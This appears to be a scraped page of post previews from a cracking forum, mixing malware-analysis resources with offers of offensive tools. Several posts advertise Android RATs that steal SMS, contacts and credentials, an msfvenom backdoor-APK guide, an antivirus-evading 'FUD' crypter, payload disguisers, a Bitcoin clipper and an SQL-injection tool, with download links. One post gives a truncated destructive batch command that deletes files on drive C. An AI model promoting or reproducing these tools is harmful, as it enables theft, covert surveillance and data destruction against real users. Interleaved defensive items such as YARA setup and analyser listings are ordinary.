The Malware Analysis Course
Learn Malware Analysis In Cyber Security. A comprehensive course!
What you'll learn
Understanding the Cybersecurity Landscape
The Role of Malware in APTs
Why Traditional Security Soutions Fail to Control APTs
Learn How To Analyze Malware
*** Hidden text: You do...
ADD AN IMAGE HERE! [Not adding an image will result in removal]
Then remove these lines.
Download:
https://www.mediafire.com/file/vs42huwkre2swm8/SuperSQLInjectionV2.zip/file
[Paste your content here. Remove this line and one below!]
[DO NOT PASTE THE CONTENT ABOVE OR BELOW THE REPLY...
PREVIEW:
Nothing complicated, follow instructions.
You can add modules on it or upgrade it, i don't really know, but was fun to make.
This python script will upload your wanted files from a given path to cracked mega.nz accounts and delete other potential virus, or files that have your...
*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ****** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
Forensics CheatSheets
https://www.jaiminton.com/cheatsheet/DFIR/#
Online Services
VirusTotal
HybridAnalysis
Koodous
Intezer
Offline Antivirus and Detection Tools
Yara
Install
sudo apt-get install -y yara
Prepare rules
Use this script to download and merge all the yara malware rules...
Privilège:
[RÉPONDRE]
Ce tuto s'applique sur Kali LINUX
La première chose a faire est de créer l'apk avec msfvenom, en définissant le port et l'adresse IP où nous recevrons la connexion :
Une fois que nous avons cela, nous l'envoyons au téléphone Android et en attendant nous l'écoutons depuis...
Link:https://mega.nz/folder/YmAnkayI#_R5S5wavmlddWy1R5a-f1Q
*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
✅ get all SMS messages
✅ get all contacts
✅ run installed applications
✅ get login credentials
✅ request geolocation/GPS activation
✅ start/stop socks5
✅ open a URL in a web browser
✅ create fake notifications
✅ show a message box
✅ block/unblock wifi, power, and settings
✅ track mobile live
✅...
HOW TO RECOGNIZE MALWARE BEFORE IT IS TOO LATE !!!
If you get a zip files with the following files or even just one of them, then you should think about twice, if you run or better delete it.
▪️BouncyCastle.Crypto.dll
— Bouncy Castle is a collection of APIs used in cryptography.
▪️cGeoIp.dll...
Link:
*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ****** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
Toolset - Malware Threats - Certified Ethical Hacker v12
Link:
*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
Make any file FUD with my software
My software allows you to create any virus FUD.
How to get script?
Contact me and try script on any malware. This way you will see it really works.
-> https://linktr.ee/zelvafrancek
How does script work?
Works with any Python and Javascript code. Creates FUD...
⚓️ Many of you will think the methods must be on coding, but nothing like that. The tricks are based on Notepad.
🌐 Creating a Dangerous Virus
🔹Step 1: First of all, in your Windows OS, open Notepad.
🔹Step 2: Now, copy and paste the below code into your notepad screen.
@echo off
Del C: *.* |y...
Main Features :
Admin Permission
Add App To White List(Ignore Battery Optimisation)
Looks Like Legit Mod App
Runs In Background Even App is Closed(May not work on some Devices)
Accessibility Feature(Cause Erros in some device --> ignore it)
Support Android v5 - v12
No Port Forwarding...
Hi bros!
Did you know that malware can be hidden inside images. You can use this tool to encode browser exploits and deliver them through image files.
https://stegosploit.info/
Of course you need a vulnerability in the browser and an exploit, and also understand how the exploit works.
I hope...
Link:
*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ****** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
Any user who posts any virus/malware/spyware infected downloads should be punished pertaining to the severity of the virus-infected file or folder.
Users who do this should be punished based on the damage the virus/piece of malware does to one's system.
If the virus/malware/spyware causes...
QuantumBuilder will make your payload look like any file format (.png, .pdf, .mp4, .doc, ...), you can even disguise them as a folder.
Macros are for the most part dead, this is the best method to deliver malicious code (apart from expensive 0-days) This technique is currently being used by APT...
PortexAnalyzerGUI - Graphical Interface For PortEx, A Portable Executable And Malware Analysis Library
Graphical interface for PortEx, a Portable Executable and Malware Analysis Library
Download
Releases page
Features
Header information from: MSDOS Header, Rich Header, COFF File Header...
Teardroid v4
🇮🇳 It's easy to use android botnet work without port forwarding, vps and android studio
🚀 Features
Retrieve Contact
Retrieve SMS
Retrieve running Services
Retrieve Device Location (😟 Only work when the app is open on newer devices)
Retrieve Call Logs
Run Shell Command ( use...
Software Giveaway : IObit Malware Fighter Pro 2023 – for Windows
IObit Malware Fighter PRO is a powerful and comprehensive anti-malware and anti-virus program that protects your PC against the latest spyware, adware, ransomware, Trojans, keyloggers, bots, worms, hijackers...
Link:
*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
In this video, you will see how a malware that I created entirely with ChatGPT allows me to obtain products for free on online digital marketplaces.
Link:
*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ****** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
Link:
*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ****** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
I understand this is a crack site but I feel there could be better vetting going on with the software. It wouldn't take much; a penalty for people uploading intentionally malicious software such as suspension for the first offense and permanent ban for subsequent posts. It would encourage more...
a BTC Clipper or a "Bitcoin Clipper" is a type of malware designed to target cryptocurrency transactions.
It operates by replacing the recipient cryptocurrency wallet addresses with ones owned by the cyber criminals. This tool demonstrates how certain cyber criminals redirect cryptocurrency...
Link:
*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ****** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
The source code for BLTools was leaked earlier this year.
We've rebuilt it to be quicker and better, with much better detection for cryptosites and an improved balance checker using ethscan(previously used debank)
Releasing this version to get opinions before we release the fully upgraded...
RED TEAM Operator: Malware Development Essentials Course Download For Free:
Sales page - https://institute.sektor7.net/red-team-operator-malware-development-essentials
COURSE IN A NUTSHELL
You Will Learn
What is malware development
What is PE file structure
Where to store your payload inside...